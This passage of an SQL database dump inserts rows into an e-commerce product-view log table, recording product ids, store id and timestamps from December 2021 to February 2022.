(621, NULL, NULL, 2061, 1, '2021-12-19 02:13:57'),
(622, NULL, NULL, 2059, 1, '2021-12-19 02:14:08'),
(623, NULL, NULL, 2058, 1, '2021-12-19 02:14:17'),
(624, NULL, NULL, 2055, 1, '2021-12-19 02:14:26'),
(625, NULL, NULL, 2054, 1, '2021-12-19 02:14:40'),
(626, NULL, NULL, 2060, 1, '2021-12-19 02:14:57'),
(627, NULL, NULL, 2053, 1, '2021-12-19 02:20:14'),
(628, NULL, NULL, 2061, 1, '2021-12-19 05:39:21'),
(629, NULL, NULL, 2061, 1, '2021-12-19 14:18:17'),
(630, NULL, NULL, 2062, 1, '2021-12-19 18:00:34'),
(631, NULL, NULL, 2059, 1, '2021-12-19 19:47:47'),
(632, NULL, NULL, 2059, 1, '2021-12-20 01:00:43'),
(633, NULL, NULL, 2060, 1, '2021-12-21 00:01:18'),
(634, NULL, NULL, 2060, 1, '2021-12-21 00:02:15'),
(635, NULL, NULL, 2062, 1, '2021-12-21 02:07:40'),
(636, NULL, NULL, 2060, 1, '2021-12-21 07:07:58'),
(637, 143, NULL, 2064, 1, '2021-12-22 07:33:49'),
(641, NULL, NULL, 2064, 1, '2021-12-22 11:22:02'),
(642, NULL, NULL, 2064, 1, '2021-12-22 16:54:55'),
(643, NULL, NULL, 2055, 1, '2021-12-22 19:41:34'),
(644, NULL, NULL, 2060, 1, '2021-12-22 21:06:03'),
(645, NULL, NULL, 2054, 1, '2021-12-22 21:23:51'),
(646, NULL, NULL, 2061, 1, '2021-12-23 08:59:03'),
(647, NULL, NULL, 2055, 1, '2021-12-23 16:32:52'),
(648, NULL, NULL, 2058, 1, '2021-12-23 16:32:54'),
(649, NULL, NULL, 2055, 1, '2021-12-23 19:25:06'),
(650, NULL, NULL, 2063, 1, '2021-12-23 22:52:51'),
(651, NULL, NULL, 2063, 1, '2021-12-23 23:08:48'),
(652, NULL, NULL, 2058, 1, '2021-12-23 23:10:27'),
(653, NULL, NULL, 2062, 1, '2021-12-24 00:07:58'),
(654, NULL, NULL, 2054, 1, '2021-12-24 00:37:15'),
(655, NULL, NULL, 2059, 1, '2021-12-24 00:37:54'),
(656, NULL, NULL, 2055, 1, '2021-12-24 03:21:27'),
(657, NULL, NULL, 2060, 1, '2021-12-24 04:19:43'),
(658, NULL, NULL, 2055, 1, '2021-12-24 14:06:01'),
(659, NULL, NULL, 2054, 1, '2021-12-24 19:32:42'),
(660, NULL, NULL, 2055, 1, '2021-12-24 19:32:51'),
(661, NULL, NULL, 2064, 1, '2021-12-24 19:33:25'),
(662, NULL, NULL, 2063, 1, '2021-12-24 19:33:34'),
(663, NULL, NULL, 2062, 1, '2021-12-24 19:33:43'),
(664, NULL, NULL, 2060, 1, '2021-12-24 19:33:51'),
(665, NULL, NULL, 2059, 1, '2021-12-24 19:34:00'),
(666, NULL, NULL, 2061, 1, '2021-12-24 19:34:10'),
(667, NULL, NULL, 2058, 1, '2021-12-24 19:34:20'),
(668, NULL, NULL, 2054, 1, '2021-12-24 23:40:03'),
(669, NULL, NULL, 2053, 1, '2021-12-25 05:08:51'),
(670, NULL, NULL, 2058, 1, '2021-12-26 14:58:13'),
(671, NULL, NULL, 2060, 1, '2021-12-27 14:02:34'),
(672, NULL, NULL, 2061, 1, '2021-12-28 12:41:48'),
(673, NULL, NULL, 2059, 1, '2021-12-28 23:50:40'),
(674, NULL, NULL, 2064, 1, '2021-12-29 07:03:28'),
(675, NULL, NULL, 2063, 1, '2021-12-29 07:03:41'),
(676, NULL, NULL, 2062, 1, '2021-12-29 07:03:51'),
(677, NULL, NULL, 2061, 1, '2021-12-29 07:04:01'),
(678, NULL, NULL, 2060, 1, '2021-12-29 07:04:13'),
(679, NULL, NULL, 2059, 1, '2021-12-29 07:04:25'),
(680, NULL, NULL, 2058, 1, '2021-12-29 07:04:32'),
(681, NULL, NULL, 2055, 1, '2021-12-29 07:04:42'),
(682, NULL, NULL, 2054, 1, '2021-12-29 07:04:55'),
(683, NULL, NULL, 2053, 1, '2021-12-29 07:18:12'),
(684, NULL, NULL, 2054, 1, '2021-12-30 00:14:12'),
(685, NULL, NULL, 2055, 1, '2021-12-30 00:35:26'),
(686, NULL, NULL, 2060, 1, '2021-12-30 03:34:42'),
(687, NULL, NULL, 2062, 1, '2021-12-30 04:53:37'),
(688, NULL, NULL, 2059, 1, '2021-12-30 20:35:15'),
(689, NULL, NULL, 2061, 1, '2021-12-30 23:22:06'),
(690, NULL, NULL, 2058, 1, '2021-12-31 04:53:35'),
(691, NULL, NULL, 2058, 1, '2021-12-31 14:31:05'),
(692, 151, NULL, 2064, 1, '2021-12-31 16:40:45'),
(695, NULL, NULL, 2058, 1, '2021-12-31 17:31:15'),
(696, NULL, NULL, 2063, 1, '2021-12-31 18:48:25'),
(697, NULL, NULL, 2062, 1, '2021-12-31 21:00:59'),
(698, NULL, NULL, 2055, 1, '2021-12-31 21:33:33'),
(699, NULL, NULL, 2061, 1, '2021-12-31 21:58:35'),
(700, NULL, NULL, 2062, 1, '2021-12-31 22:17:13'),
(701, NULL, NULL, 2064, 1, '2021-12-31 22:17:44'),
(702, NULL, NULL, 2060, 1, '2021-12-31 22:18:12'),
(703, NULL, NULL, 2059, 1, '2021-12-31 22:18:16'),
(704, NULL, NULL, 2063, 1, '2021-12-31 22:18:21'),
(705, NULL, NULL, 2054, 1, '2021-12-31 22:18:23'),
(706, NULL, NULL, 2058, 1, '2021-12-31 22:18:26'),
(707, NULL, NULL, 2061, 1, '2021-12-31 22:21:08'),
(708, NULL, NULL, 2055, 1, '2021-12-31 22:22:09'),
(709, NULL, NULL, 2064, 1, '2021-12-31 22:25:23'),
(710, NULL, NULL, 2060, 1, '2021-12-31 22:36:58'),
(711, NULL, NULL, 2059, 1, '2021-12-31 23:46:46'),
(712, NULL, NULL, 2064, 1, '2022-01-01 13:18:58'),
(713, NULL, NULL, 2063, 1, '2022-01-01 13:19:11'),
(714, NULL, NULL, 2062, 1, '2022-01-01 13:19:23'),
(715, NULL, NULL, 2054, 1, '2022-01-01 17:27:51'),
(716, NULL, NULL, 2055, 1, '2022-01-01 21:34:35'),
(717, NULL, NULL, 2054, 1, '2022-01-02 00:47:56'),
(718, NULL, NULL, 2060, 1, '2022-01-03 12:58:06'),
(719, NULL, NULL, 2062, 1, '2022-01-04 12:23:36'),
(720, NULL, NULL, 2062, 1, '2022-01-04 18:39:34'),
(721, NULL, NULL, 2061, 1, '2022-01-04 19:21:53'),
(722, NULL, NULL, 2055, 1, '2022-01-04 19:44:27'),
(723, NULL, NULL, 2055, 1, '2022-01-05 02:25:31'),
(724, NULL, NULL, 2061, 1, '2022-01-05 06:47:55'),
(725, NULL, NULL, 2061, 1, '2022-01-05 07:51:57'),
(726, NULL, NULL, 2055, 1, '2022-01-05 08:29:31'),
(727, NULL, NULL, 2064, 1, '2022-01-05 08:36:57'),
(728, NULL, NULL, 2064, 1, '2022-01-05 08:45:55'),
(729, NULL, NULL, 2064, 1, '2022-01-05 09:15:55'),
(730, NULL, NULL, 2058, 1, '2022-01-05 09:53:11'),
(731, NULL, NULL, 2062, 1, '2022-01-05 09:57:41'),
(732, NULL, NULL, 2062, 1, '2022-01-05 11:09:37'),
(733, NULL, NULL, 2055, 1, '2022-01-05 13:24:29'),
(734, NULL, NULL, 2064, 1, '2022-01-05 18:57:54'),
(735, NULL, NULL, 2064, 1, '2022-01-06 04:12:26'),
(736, NULL, NULL, 2062, 1, '2022-01-06 04:12:46'),
(737, NULL, NULL, 2063, 1, '2022-01-06 04:12:56'),
(738, NULL, NULL, 2061, 1, '2022-01-06 04:12:58'),
(739, NULL, NULL, 2059, 1, '2022-01-06 04:13:01'),
(740, NULL, NULL, 2058, 1, '2022-01-06 04:13:03'),
(741, NULL, NULL, 2055, 1, '2022-01-06 04:13:05'),
(742, NULL, NULL, 2054, 1, '2022-01-06 04:13:07'),
(743, NULL, NULL, 2060, 1, '2022-01-06 04:13:10'),
(744, NULL, NULL, 2054, 1, '2022-01-06 06:12:00'),
(745, NULL, NULL, 2061, 1, '2022-01-06 09:28:38'),
(746, NULL, NULL, 2058, 1, '2022-01-07 09:31:13'),
(747, NULL, NULL, 2061, 1, '2022-01-07 09:31:16'),
(748, NULL, NULL, 2062, 1, '2022-01-07 09:31:17'),
(749, NULL, NULL, 2060, 1, '2022-01-07 09:31:27'),
(750, NULL, NULL, 2063, 1, '2022-01-07 09:31:32'),
(751, NULL, NULL, 2059, 1, '2022-01-07 09:31:37'),
(752, NULL, NULL, 2064, 1, '2022-01-07 09:31:44'),
(753, NULL, NULL, 2055, 1, '2022-01-07 09:31:52'),
(754, NULL, NULL, 2061, 1, '2022-01-07 11:30:30'),
(755, NULL, NULL, 2061, 1, '2022-01-07 23:07:02'),
(756, NULL, NULL, 2064, 1, '2022-01-08 00:14:25'),
(757, NULL, NULL, 2064, 1, '2022-01-08 09:48:20'),
(758, NULL, NULL, 2061, 1, '2022-01-08 10:33:16'),
(759, NULL, NULL, 2064, 1, '2022-01-08 10:33:22'),
(760, NULL, NULL, 2054, 1, '2022-01-08 12:56:11'),
(761, NULL, NULL, 2062, 1, '2022-01-08 18:03:16'),
(762, NULL, NULL, 2064, 1, '2022-01-08 21:23:44'),
(763, NULL, NULL, 2061, 1, '2022-01-08 22:09:12'),
(764, NULL, NULL, 2055, 1, '2022-01-08 22:41:11'),
(765, NULL, NULL, 2062, 1, '2022-01-09 06:06:05'),
(766, NULL, NULL, 2059, 1, '2022-01-09 09:57:31'),
(767, NULL, NULL, 2064, 1, '2022-01-09 09:57:39'),
(768, NULL, NULL, 2060, 1, '2022-01-09 09:57:45'),
(769, NULL, NULL, 2061, 1, '2022-01-09 09:58:01'),
(770, NULL, NULL, 2054, 1, '2022-01-09 11:22:08'),
(771, NULL, NULL, 2055, 1, '2022-01-09 11:22:20'),
(772, NULL, NULL, 2064, 1, '2022-01-09 11:22:24'),
(773, NULL, NULL, 2063, 1, '2022-01-09 11:22:25'),
(774, NULL, NULL, 2060, 1, '2022-01-09 11:22:26'),
(775, NULL, NULL, 2059, 1, '2022-01-09 11:22:27'),
(776, NULL, NULL, 2062, 1, '2022-01-09 11:22:28'),
(777, NULL, NULL, 2058, 1, '2022-01-09 11:22:30'),
(778, NULL, NULL, 2061, 1, '2022-01-09 11:22:31'),
(779, NULL, NULL, 2064, 1, '2022-01-09 18:01:51'),
(780, NULL, NULL, 2061, 1, '2022-01-09 18:01:57'),
(781, NULL, NULL, 2059, 1, '2022-01-09 18:54:39'),
(782, NULL, NULL, 2059, 1, '2022-01-09 19:47:32'),
(783, NULL, NULL, 2064, 1, '2022-01-10 10:56:58'),
(784, NULL, NULL, 2064, 1, '2022-01-10 10:57:02'),
(785, NULL, NULL, 2064, 1, '2022-01-10 10:57:04'),
(786, NULL, NULL, 2064, 1, '2022-01-10 10:57:07'),
(787, NULL, NULL, 2063, 1, '2022-01-10 10:57:10'),
(788, NULL, NULL, 2063, 1, '2022-01-10 10:57:12'),
(789, NULL, NULL, 2062, 1, '2022-01-10 10:57:15'),
(790, NULL, NULL, 2062, 1, '2022-01-10 10:57:18'),
(791, NULL, NULL, 2061, 1, '2022-01-10 10:57:20'),
(792, NULL, NULL, 2061, 1, '2022-01-10 10:57:23'),
(793, NULL, NULL, 2060, 1, '2022-01-10 10:57:26'),
(794, NULL, NULL, 2061, 1, '2022-01-10 10:57:34'),
(795, NULL, NULL, 2059, 1, '2022-01-10 10:57:37'),
(796, NULL, NULL, 2059, 1, '2022-01-10 10:57:39'),
(797, NULL, NULL, 2058, 1, '2022-01-10 10:57:41'),
(798, NULL, NULL, 2058, 1, '2022-01-10 10:57:44'),
(799, NULL, NULL, 2054, 1, '2022-01-10 10:57:46'),
(800, NULL, NULL, 2054, 1, '2022-01-10 10:57:49'),
(801, NULL, NULL, 2064, 1, '2022-01-10 10:57:51'),
(802, NULL, NULL, 2064, 1, '2022-01-10 10:57:54'),
(803, NULL, NULL, 2064, 1, '2022-01-10 10:57:56'),
(804, NULL, NULL, 2063, 1, '2022-01-10 10:57:59'),
(805, NULL, NULL, 2063, 1, '2022-01-10 10:58:01'),
(806, NULL, NULL, 2062, 1, '2022-01-10 10:58:04'),
(807, NULL, NULL, 2062, 1, '2022-01-10 10:58:06'),
(808, NULL, NULL, 2061, 1, '2022-01-10 10:58:09'),
(809, NULL, NULL, 2061, 1, '2022-01-10 10:58:11'),
(810, NULL, NULL, 2055, 1, '2022-01-10 13:17:04'),
(811, NULL, NULL, 2055, 1, '2022-01-11 01:29:14'),
(812, NULL, NULL, 2060, 1, '2022-01-11 05:06:47'),
(813, NULL, NULL, 2062, 1, '2022-01-11 07:28:19'),
(814, NULL, NULL, 2061, 1, '2022-01-11 09:56:59'),
(815, NULL, NULL, 2054, 1, '2022-01-11 10:27:54'),
(816, NULL, NULL, 2055, 1, '2022-01-11 10:27:57'),
(817, NULL, NULL, 2064, 1, '2022-01-11 10:28:13'),
(818, NULL, NULL, 2063, 1, '2022-01-11 10:28:17'),
(819, NULL, NULL, 2062, 1, '2022-01-11 10:28:23'),
(820, NULL, NULL, 2060, 1, '2022-01-11 10:28:29'),
(821, NULL, NULL, 2059, 1, '2022-01-11 10:28:33'),
(822, NULL, NULL, 2061, 1, '2022-01-11 10:28:37'),
(823, NULL, NULL, 2058, 1, '2022-01-11 10:28:41'),
(824, NULL, NULL, 2053, 1, '2022-01-11 14:42:53'),
(825, NULL, NULL, 2053, 1, '2022-01-11 17:24:34'),
(826, NULL, NULL, 2061, 1, '2022-01-11 21:44:41'),
(827, NULL, NULL, 2058, 1, '2022-01-11 21:55:03'),
(828, NULL, NULL, 2062, 1, '2022-01-12 06:48:23'),
(829, NULL, NULL, 2061, 1, '2022-01-12 12:29:45'),
(830, 186, NULL, 2064, 1, '2022-01-12 14:42:11'),
(834, NULL, NULL, 2061, 1, '2022-01-12 19:20:55'),
(835, NULL, NULL, 2053, 1, '2022-01-12 21:36:19'),
(836, NULL, NULL, 2061, 1, '2022-01-12 22:55:46'),
(837, NULL, NULL, 2064, 1, '2022-01-13 01:23:23'),
(838, NULL, NULL, 2055, 1, '2022-01-13 02:50:59'),
(839, NULL, NULL, 2064, 1, '2022-01-13 03:08:15'),
(840, NULL, NULL, 2062, 1, '2022-01-13 03:08:53'),
(841, NULL, NULL, 2063, 1, '2022-01-13 03:09:04'),
(842, NULL, NULL, 2061, 1, '2022-01-13 03:09:06'),
(843, NULL, NULL, 2059, 1, '2022-01-13 03:09:08'),
(844, NULL, NULL, 2058, 1, '2022-01-13 03:09:11'),
(845, NULL, NULL, 2055, 1, '2022-01-13 03:09:13'),
(846, NULL, NULL, 2054, 1, '2022-01-13 03:09:16'),
(847, NULL, NULL, 2060, 1, '2022-01-13 03:09:25'),
(848, NULL, NULL, 2061, 1, '2022-01-13 06:35:55'),
(849, NULL, NULL, 2061, 1, '2022-01-13 17:50:55'),
(850, NULL, NULL, 2060, 1, '2022-01-13 19:01:59'),
(851, NULL, NULL, 2054, 1, '2022-01-13 20:11:34'),
(852, NULL, NULL, 2064, 1, '2022-01-14 00:37:31'),
(853, NULL, NULL, 2064, 1, '2022-01-14 01:27:38'),
(854, 191, NULL, 2064, 1, '2022-01-14 01:51:15'),
(858, NULL, NULL, 2055, 1, '2022-01-14 04:18:56'),
(859, NULL, NULL, 2059, 1, '2022-01-14 23:07:09'),
(860, NULL, NULL, 2061, 1, '2022-01-15 00:00:03'),
(861, NULL, NULL, 2062, 1, '2022-01-15 01:11:41'),
(862, NULL, NULL, 2055, 1, '2022-01-15 08:46:14'),
(863, NULL, NULL, 2055, 1, '2022-01-16 13:15:39'),
(864, NULL, NULL, 2064, 1, '2022-01-16 15:32:49'),
(865, NULL, NULL, 2054, 1, '2022-01-16 17:56:26'),
(866, NULL, NULL, 2055, 1, '2022-01-17 04:39:03'),
(867, NULL, NULL, 2064, 1, '2022-01-17 06:43:59'),
(868, NULL, NULL, 2062, 1, '2022-01-17 06:44:40'),
(869, NULL, NULL, 2063, 1, '2022-01-17 06:44:51'),
(870, NULL, NULL, 2061, 1, '2022-01-17 06:44:53'),
(871, NULL, NULL, 2059, 1, '2022-01-17 06:44:55'),
(872, NULL, NULL, 2058, 1, '2022-01-17 06:44:58'),
(873, NULL, NULL, 2055, 1, '2022-01-17 06:45:00'),
(874, NULL, NULL, 2054, 1, '2022-01-17 06:45:02'),
(875, NULL, NULL, 2060, 1, '2022-01-17 06:45:15'),
(876, NULL, NULL, 2064, 1, '2022-01-17 22:45:49'),
(877, NULL, NULL, 2059, 1, '2022-01-18 01:07:23'),
(878, NULL, NULL, 2054, 1, '2022-01-18 12:52:31'),
(879, NULL, NULL, 2055, 1, '2022-01-18 12:52:36'),
(880, NULL, NULL, 2064, 1, '2022-01-18 12:52:56'),
(881, NULL, NULL, 2063, 1, '2022-01-18 12:53:02'),
(882, NULL, NULL, 2062, 1, '2022-01-18 12:53:07'),
(883, NULL, NULL, 2060, 1, '2022-01-18 12:53:14'),
(884, NULL, NULL, 2059, 1, '2022-01-18 12:53:18'),
(885, NULL, NULL, 2061, 1, '2022-01-18 12:53:22'),
(886, NULL, NULL, 2058, 1, '2022-01-18 12:53:26'),
(887, NULL, NULL, 2053, 1, '2022-01-18 17:53:25'),
(888, NULL, NULL, 2058, 1, '2022-01-18 19:28:56'),
(889, NULL, NULL, 2061, 1, '2022-01-18 19:28:57'),
(890, NULL, NULL, 2062, 1, '2022-01-18 19:28:58'),
(891, NULL, NULL, 2060, 1, '2022-01-18 19:29:00'),
(892, NULL, NULL, 2063, 1, '2022-01-18 19:29:01'),
(893, NULL, NULL, 2059, 1, '2022-01-18 19:29:02'),
(894, NULL, NULL, 2064, 1, '2022-01-18 19:29:04'),
(895, NULL, NULL, 2055, 1, '2022-01-18 19:29:06'),
(896, NULL, NULL, 2064, 1, '2022-01-18 22:46:48'),
(897, NULL, NULL, 2062, 1, '2022-01-18 22:56:24'),
(898, NULL, NULL, 2060, 1, '2022-01-19 02:11:04'),
(899, NULL, NULL, 2062, 1, '2022-01-19 02:47:19'),
(900, NULL, NULL, 2062, 1, '2022-01-19 03:17:20'),
(901, NULL, NULL, 2061, 1, '2022-01-19 05:24:48'),
(902, NULL, NULL, 2058, 1, '2022-01-19 10:04:24'),
(903, NULL, NULL, 2054, 1, '2022-01-19 10:05:45'),
(904, NULL, NULL, 2055, 1, '2022-01-19 10:05:48'),
(905, NULL, NULL, 2064, 1, '2022-01-19 10:05:52'),
(906, NULL, NULL, 2063, 1, '2022-01-19 10:05:55'),
(907, NULL, NULL, 2062, 1, '2022-01-19 10:06:01'),
(908, NULL, NULL, 2060, 1, '2022-01-19 10:06:06'),
(909, NULL, NULL, 2059, 1, '2022-01-19 10:06:13'),
(910, NULL, NULL, 2061, 1, '2022-01-19 10:06:21'),
(911, NULL, NULL, 2053, 1, '2022-01-19 10:32:18'),
(912, NULL, NULL, 2054, 1, '2022-01-19 10:32:31'),
(913, NULL, NULL, 2055, 1, '2022-01-19 10:32:49'),
(914, NULL, NULL, 2064, 1, '2022-01-19 10:33:59'),
(915, NULL, NULL, 2063, 1, '2022-01-19 10:34:03'),
(916, NULL, NULL, 2062, 1, '2022-01-19 10:34:06'),
(917, NULL, NULL, 2060, 1, '2022-01-19 10:34:08'),
(918, NULL, NULL, 2059, 1, '2022-01-19 10:34:11'),
(919, NULL, NULL, 2061, 1, '2022-01-19 10:34:14'),
(920, NULL, NULL, 2058, 1, '2022-01-19 10:34:16'),
(921, NULL, NULL, 2064, 1, '2022-01-19 14:46:35'),
(922, NULL, NULL, 2055, 1, '2022-01-19 15:11:11'),
(923, NULL, NULL, 2061, 1, '2022-01-19 16:42:32'),
(924, NULL, NULL, 2058, 1, '2022-01-19 17:24:56'),
(925, NULL, NULL, 2059, 1, '2022-01-19 18:09:10'),
(926, NULL, NULL, 2061, 1, '2022-01-19 18:20:33'),
(927, NULL, NULL, 2055, 1, '2022-01-20 01:20:49'),
(928, NULL, NULL, 2055, 1, '2022-01-20 02:35:44'),
(929, NULL, NULL, 2058, 1, '2022-01-20 11:50:12'),
(930, NULL, NULL, 2061, 1, '2022-01-20 16:02:51'),
(931, NULL, NULL, 2061, 1, '2022-01-21 01:05:56'),
(932, NULL, NULL, 2062, 1, '2022-01-21 09:30:02'),
(933, NULL, NULL, 2061, 1, '2022-01-22 06:20:41'),
(934, NULL, NULL, 2055, 1, '2022-01-22 17:24:21'),
(935, NULL, NULL, 2064, 1, '2022-01-22 17:51:07'),
(936, NULL, NULL, 2064, 1, '2022-01-23 16:05:29'),
(937, NULL, NULL, 2054, 1, '2022-01-23 18:08:49'),
(938, NULL, NULL, 2055, 1, '2022-01-24 00:00:31'),
(939, NULL, NULL, 2064, 1, '2022-01-24 07:08:06'),
(940, NULL, NULL, 2061, 1, '2022-01-24 07:08:33'),
(941, NULL, NULL, 2058, 1, '2022-01-24 07:08:44'),
(942, NULL, NULL, 2055, 1, '2022-01-24 07:08:48'),
(943, NULL, NULL, 2059, 1, '2022-01-24 07:09:01'),
(944, NULL, NULL, 2054, 1, '2022-01-24 07:09:03'),
(945, NULL, NULL, 2062, 1, '2022-01-24 07:09:13'),
(946, NULL, NULL, 2063, 1, '2022-01-24 07:09:25'),
(947, NULL, NULL, 2060, 1, '2022-01-24 07:09:51'),
(948, NULL, NULL, 2062, 1, '2022-01-24 15:29:03'),
(949, NULL, NULL, 2055, 1, '2022-01-24 21:11:28'),
(950, NULL, NULL, 2058, 1, '2022-01-25 04:46:03'),
(951, NULL, NULL, 2063, 1, '2022-01-25 07:11:17'),
(952, NULL, NULL, 2055, 1, '2022-01-25 07:22:47'),
(953, NULL, NULL, 2062, 1, '2022-01-25 11:08:40'),
(954, NULL, NULL, 2063, 1, '2022-01-25 15:01:26'),
(955, NULL, NULL, 2060, 1, '2022-01-25 21:10:28'),
(956, NULL, NULL, 2062, 1, '2022-01-26 02:45:38'),
(957, NULL, NULL, 2062, 1, '2022-01-26 04:30:43'),
(958, NULL, NULL, 2064, 1, '2022-01-26 09:51:43'),
(959, NULL, NULL, 2063, 1, '2022-01-26 21:05:42'),
(960, NULL, NULL, 2062, 1, '2022-01-26 21:05:44'),
(961, NULL, NULL, 2064, 1, '2022-01-26 21:05:45'),
(962, NULL, NULL, 2061, 1, '2022-01-26 21:05:46'),
(963, NULL, NULL, 2060, 1, '2022-01-26 21:05:47'),
(964, NULL, NULL, 2059, 1, '2022-01-26 21:05:50'),
(965, NULL, NULL, 2058, 1, '2022-01-26 21:05:53'),
(966, NULL, NULL, 2055, 1, '2022-01-27 16:51:54'),
(967, NULL, NULL, 2055, 1, '2022-01-27 18:18:07'),
(968, NULL, NULL, 2062, 1, '2022-01-27 20:53:19'),
(969, NULL, NULL, 2058, 1, '2022-01-28 04:39:53'),
(970, NULL, NULL, 2058, 1, '2022-01-28 04:49:51'),
(971, NULL, NULL, 2059, 1, '2022-01-28 05:13:52'),
(972, NULL, NULL, 2054, 1, '2022-01-28 09:18:39'),
(973, NULL, NULL, 2061, 1, '2022-01-28 10:59:12'),
(974, NULL, NULL, 2062, 1, '2022-01-28 12:11:50'),
(975, NULL, NULL, 2063, 1, '2022-01-28 13:31:29'),
(976, NULL, NULL, 2061, 1, '2022-01-28 17:34:07'),
(977, NULL, NULL, 2061, 1, '2022-01-28 20:28:35'),
(978, NULL, NULL, 2064, 1, '2022-01-28 23:12:41'),
(979, NULL, NULL, 2059, 1, '2022-01-29 00:12:05'),
(980, NULL, NULL, 2058, 1, '2022-01-29 00:49:23'),
(981, NULL, NULL, 2062, 1, '2022-01-29 11:39:30'),
(982, NULL, NULL, 2058, 1, '2022-01-30 10:38:00'),
(983, NULL, NULL, 2061, 1, '2022-01-30 10:38:03'),
(984, NULL, NULL, 2062, 1, '2022-01-30 10:38:05'),
(985, NULL, NULL, 2060, 1, '2022-01-30 10:38:06'),
(986, NULL, NULL, 2063, 1, '2022-01-30 10:38:07'),
(987, NULL, NULL, 2059, 1, '2022-01-30 10:38:09'),
(988, NULL, NULL, 2064, 1, '2022-01-30 10:38:10'),
(989, NULL, NULL, 2055, 1, '2022-01-30 10:38:12'),
(990, NULL, NULL, 2064, 1, '2022-01-30 15:01:23'),
(991, NULL, NULL, 2055, 1, '2022-01-30 22:03:11'),
(992, NULL, NULL, 2064, 1, '2022-01-31 01:01:25'),
(993, NULL, NULL, 2061, 1, '2022-01-31 06:01:23'),
(994, NULL, NULL, 2054, 1, '2022-01-31 09:29:46'),
(995, NULL, NULL, 2055, 1, '2022-01-31 09:29:53'),
(996, NULL, NULL, 2064, 1, '2022-01-31 09:30:13'),
(997, NULL, NULL, 2063, 1, '2022-01-31 09:30:17'),
(998, NULL, NULL, 2062, 1, '2022-01-31 09:30:22'),
(999, NULL, NULL, 2060, 1, '2022-01-31 09:30:30'),
(1000, NULL, NULL, 2059, 1, '2022-01-31 09:30:37'),
(1001, NULL, NULL, 2061, 1, '2022-01-31 09:30:45'),
(1002, NULL, NULL, 2058, 1, '2022-01-31 09:30:53'),
(1003, NULL, NULL, 2055, 1, '2022-01-31 12:05:11'),
(1004, NULL, NULL, 2053, 1, '2022-01-31 12:59:26'),
(1005, NULL, NULL, 2055, 1, '2022-01-31 18:10:00'),
(1006, NULL, NULL, 2064, 1, '2022-01-31 18:40:00'),
(1007, NULL, NULL, 2059, 1, '2022-01-31 20:41:44'),
(1008, NULL, NULL, 2054, 1, '2022-01-31 21:39:02'),
(1009, NULL, NULL, 2062, 1, '2022-02-01 02:31:07'),
(1010, NULL, NULL, 2055, 1, '2022-02-01 05:20:07'),
(1011, NULL, NULL, 2062, 1, '2022-02-01 17:49:41'),
(1012, NULL, NULL, 2064, 1, '2022-02-02 02:41:15'),
(1013, NULL, NULL, 2064, 1, '2022-02-02 03:49:39'),
(1014, NULL, NULL, 2062, 1, '2022-02-02 03:50:05'),
(1015, NULL, NULL, 2063, 1, '2022-02-02 03:50:22'),
(1016, NULL, NULL, 2061, 1, '2022-02-02 03:50:24'),
(1017, NULL, NULL, 2059, 1, '2022-02-02 03:50:27'),
(1018, NULL, NULL, 2058, 1, '2022-02-02 03:50:30'),
(1019, NULL, NULL, 2055, 1, '2022-02-02 03:50:33'),
(1020, NULL, NULL, 2054, 1, '2022-02-02 03:50:35'),
(1021, NULL, NULL, 2060, 1, '2022-02-02 03:50:39'),
(1022, NULL, NULL, 2064, 1, '2022-02-02 04:15:43'),
(1023, NULL, NULL, 2064, 1, '2022-02-02 11:53:56'),
(1024, NULL, NULL, 2064, 1, '2022-02-02 19:13:51'),
(1025, NULL, NULL, 2060, 1, '2022-02-02 23:11:12'),
(1026, NULL, NULL, 2060, 1, '2022-02-02 23:12:11'),
(1027, NULL, NULL, 2058, 1, '2022-02-04 01:49:38'),
(1028, NULL, NULL, 2061, 1, '2022-02-04 01:49:43'),
(1029, NULL, NULL, 2062, 1, '2022-02-04 01:49:44'),
(1030, NULL, NULL, 2060, 1, '2022-02-04 01:49:45'),
(1031, NULL, NULL, 2063, 1, '2022-02-04 01:49:46'),
(1032, NULL, NULL, 2059, 1, '2022-02-04 01:49:48'),
(1033, NULL, NULL, 2064, 1, '2022-02-04 01:49:49'),
(1034, NULL, NULL, 2055, 1, '2022-02-04 01:49:51'),
(1035, NULL, NULL, 2061, 1, '2022-02-04 14:55:00'),
(1036, NULL, NULL, 2063, 1, '2022-02-04 21:50:31'),
(1037, NULL, NULL, 2055, 1, '2022-02-05 00:41:16'),
(1038, NULL, NULL, 2058, 1, '2022-02-05 11:34:32'),
(1039, NULL, NULL, 2060, 1, '2022-02-05 11:34:36'),
(1040, NULL, NULL, 2064, 1, '2022-02-05 11:34:40'),
(1041, NULL, NULL, 2062, 1, '2022-02-05 11:34:44'),
(1042, NULL, NULL, 2058, 1, '2022-02-05 19:39:12'),
(1043, NULL, NULL, 2064, 1, '2022-02-06 08:02:46'),
(1044, NULL, NULL, 2061, 1, '2022-02-06 13:30:06'),
(1045, NULL, NULL, 2061, 1, '2022-02-06 18:30:02'),
(1046, NULL, NULL, 2064, 1, '2022-02-06 21:07:10'),
(1047, NULL, NULL, 2064, 1, '2022-02-07 17:17:09'),
(1048, NULL, NULL, 2061, 1, '2022-02-07 20:43:51'),
(1049, NULL, NULL, 2054, 1, '2022-02-07 22:06:53'),
(1050, NULL, NULL, 2055, 1, '2022-02-07 23:41:03'),
(1051, NULL, NULL, 2060, 1, '2022-02-08 00:10:56'),
(1052, NULL, NULL, 2058, 1, '2022-02-08 18:24:45'),
(1053, NULL, NULL, 2060, 1, '2022-02-08 20:16:56'),
(1054, NULL, NULL, 2054, 1, '2022-02-08 22:20:50');
INSERT INTO `report_viewed_product_index` (`index_id`, `visitor_id`, `customer_id`, `product_id`, `store_id`, `added_at`) VALUES
(1055, NULL, NULL, 2055, 1, '2022-02-09 06:32:55'),
(1056, NULL, NULL, 2059, 1, '2022-02-09 09:05:55'),
(1057, NULL, NULL, 2059, 1, '2022-02-09 10:39:53'),
(1058, NULL, NULL, 2061, 1, '2022-02-09 11:08:36'),
(1059, NULL, NULL, 2055, 1, '2022-02-09 19:39:10'),
(1060, NULL, NULL, 2061, 1, '2022-02-09 23:20:21'),
(1061, NULL, NULL, 2061, 1, '2022-02-10 05:08:38'),
(1062, NULL, NULL, 2058, 1, '2022-02-10 07:07:46'),
(1063, NULL, NULL, 2064, 1, '2022-02-10 07:08:00'),
(1064, NULL, NULL, 2054, 1, '2022-02-10 07:08:09'),
(1065, NULL, NULL, 2062, 1, '2022-02-10 07:08:19'),
(1066, NULL, NULL, 2055, 1, '2022-02-10 07:08:22'),
(1067, NULL, NULL, 2060, 1, '2022-02-10 07:08:27'),
(1068, NULL, NULL, 2059, 1, '2022-02-10 07:08:34'),
